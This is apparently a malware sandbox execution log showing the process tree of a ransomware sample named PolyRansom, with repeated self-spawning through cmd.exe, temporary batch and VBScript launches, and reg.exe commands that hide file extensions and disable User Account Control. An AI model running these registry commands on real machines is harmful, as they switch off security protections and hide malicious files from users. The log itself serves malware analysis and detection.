        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        83⤵
        
        PID:5368
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        84⤵
        
        PID:5320
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        85⤵
        
        PID:1564
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        86⤵
        
        PID:7340
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        86⤵
        
        PID:7488
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        87⤵
        
        PID:5432
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        88⤵
        
        PID:6724
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        89⤵
        
        PID:5288
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        90⤵
        
        PID:5580
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        91⤵
        
        PID:6556
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        92⤵
        
        PID:6760
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        92⤵
        
        PID:7368
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        93⤵
        
        PID:7996
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        94⤵
        
        PID:7192
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        95⤵
        
        PID:7232
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        96⤵
        
        PID:1824
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        97⤵
        
        PID:6528
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        98⤵
        
        PID:5272
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        98⤵
        
        PID:7600
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        99⤵
        
        PID:1880
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        100⤵
        
        PID:6612
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        100⤵
        
        PID:6508
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        101⤵
        
        PID:5556
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        102⤵
        
        PID:7208
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        103⤵
        
        PID:8144
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        104⤵
        
        PID:6588
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        105⤵
        
        PID:5536
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        106⤵
        
        PID:8092
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        107⤵
        
        PID:7036
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        108⤵
        
        PID:7796
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        109⤵
        
        PID:4880
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        110⤵
        
        PID:4892
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        111⤵
        
        PID:6552
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        112⤵
        
        PID:7408
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        113⤵
        
        PID:1228
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        114⤵
        
        PID:2664
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        114⤵
        
        PID:6308
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        115⤵
        
        PID:3648
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        116⤵
        
        PID:8152
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        116⤵
        
        PID:7980
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        117⤵
        
        PID:6932
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        118⤵
        
        PID:8104
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        119⤵
        
        PID:5556
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        120⤵
        
        PID:4948
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        120⤵
        
        PID:8168
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        121⤵
        
        PID:6812
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        122⤵
        
        PID:1828
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        123⤵
        
        PID:6664
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        124⤵
        
        PID:7236
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        124⤵
        
        PID:6752
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        125⤵
        
        PID:7084
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        126⤵
        
        PID:6768
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        126⤵
        
        PID:5452
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        127⤵
        
        PID:7232
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        128⤵
        
        PID:6900
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        129⤵
        
        PID:7052
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        130⤵
        
        PID:7720
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        131⤵
        
        PID:5580
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        132⤵
        
        PID:3068
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        132⤵
        
        PID:8164
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        133⤵
        
        PID:6340
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        134⤵
        
        PID:1692
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        135⤵
        
        PID:5076
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        135⤵
        
        PID:7416
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        136⤵
        
        PID:7520
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        135⤵
        
        PID:6296
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        133⤵
        
        PID:8008
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        133⤵
        
        PID:7072
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        133⤵
        
        PID:6176
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        134⤵
        
        PID:7448
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\psIwkQwU.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        133⤵
        
        PID:7016
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        134⤵
        
        PID:7204
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        131⤵
        
        PID:7692
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        131⤵
        
        PID:6548
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        131⤵
        
        PID:7456
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\muwYkgMU.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        131⤵
        
        PID:6748
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        132⤵
        
        PID:4268
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        132⤵
        
        PID:7536
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        129⤵
        
        PID:7376
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        129⤵
        Modifies registry key
        
        PID:3164
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        130⤵
        
        PID:6348
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        129⤵
        
        PID:7640
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        130⤵
        
        PID:8016
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NmQIAcYY.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        129⤵
        
        PID:1384
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        130⤵
        
        PID:5732
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        127⤵
        
        PID:7388
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        128⤵
        
        PID:8080
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        127⤵
        Modifies registry key
        
        PID:540
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        128⤵
        
        PID:6528
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        127⤵
        
        PID:396
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FgMskkQE.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        127⤵
        
        PID:2476
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        128⤵
        
        PID:7868
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        125⤵
        Modifies registry key
        
        PID:3256
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        125⤵
        
        PID:7452
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        125⤵
        
        PID:6792
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DmIYcoAk.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        125⤵
        
        PID:6800
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        126⤵
        
        PID:7892
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        126⤵
        
        PID:5316
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        123⤵
        
        PID:6648
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        124⤵
        
        PID:7596
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        123⤵
        
        PID:7120
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        124⤵
        
        PID:3796
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        123⤵
        Modifies registry key
        
        PID:7832
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        124⤵
        
        PID:7244
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nkAMIQQY.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        123⤵
        
        PID:5344
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        124⤵
        
        PID:5620
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        124⤵
        
        PID:5076
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        121⤵
        
        PID:7312
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        121⤵
        Modifies registry key
        
        PID:5496
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        122⤵
        
        PID:1772
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        121⤵
        
        PID:5240
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        122⤵
        
        PID:7564
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gQwEkcEc.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        121⤵
        
        PID:7592
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        122⤵
        
        PID:4668
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        119⤵
        
        PID:7152
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        119⤵
        
        PID:7720
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        119⤵
        
        PID:6228
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        120⤵
        
        PID:7028
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sSoEoooY.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        119⤵
        
        PID:6232
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        120⤵
        
        PID:5624
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        120⤵
        
        PID:3860
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        117⤵
        Modifies registry key
        
        PID:7116
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        117⤵
        
        PID:7868
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        118⤵
        
        PID:7364
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        117⤵
        
        PID:4700
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        118⤵
        
        PID:6396
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zigscYIY.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        117⤵
        
        PID:6288
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        118⤵
        
        PID:5704
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        115⤵
        
        PID:7876
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        116⤵
        
        PID:3908
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        115⤵
        
        PID:6704
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        116⤵
        
        PID:5492
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        115⤵
        Modifies registry key
        
        PID:7252
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        116⤵
        
        PID:7796
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ReYwsoAg.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        115⤵
        
        PID:6236
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        116⤵
        
        PID:5752
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        116⤵
        
        PID:7388
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        113⤵
        
        PID:7448
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        114⤵
        
        PID:6708
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        113⤵
        Modifies registry key
        
        PID:7484
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        114⤵
        
        PID:7184
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        113⤵
        
        PID:7440
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        114⤵
        
        PID:7696
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pYAggUMc.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        113⤵
        
        PID:6828
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        114⤵
        
        PID:3560
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        114⤵
        
        PID:6464
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        111⤵
        Modifies registry key
        
        PID:6996
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        112⤵
        
        PID:6184
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        111⤵
        
        PID:6868
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        111⤵
        
        PID:7164
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FGkkggck.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        111⤵
        
        PID:7384
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        112⤵
        
        PID:4496
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        109⤵
        
        PID:1068
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        109⤵
        
        PID:7116
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        109⤵
        Modifies registry key
        
        PID:6272
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HIwQkIAs.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        109⤵
        
        PID:7532
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        110⤵
        
        PID:1824
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        107⤵
        
        PID:3648
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        108⤵
        
        PID:4920
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        107⤵
        
        PID:7260
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        108⤵
        
        PID:8020
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        107⤵
        Modifies registry key
        
        PID:6808
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GuEAsMww.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        107⤵
        
        PID:8044
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        108⤵
        
        PID:7388
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        105⤵
        
        PID:5496
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        105⤵
        
        PID:5756
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        106⤵
        
        PID:5516
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        105⤵
        
        PID:7588
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\heAkQIIU.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        105⤵
        
        PID:7112
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        106⤵
        
        PID:7440
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        103⤵
        
        PID:6976
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        104⤵
        
        PID:6576
        
        C:\Windows\SysWOW64\reg.exe
        
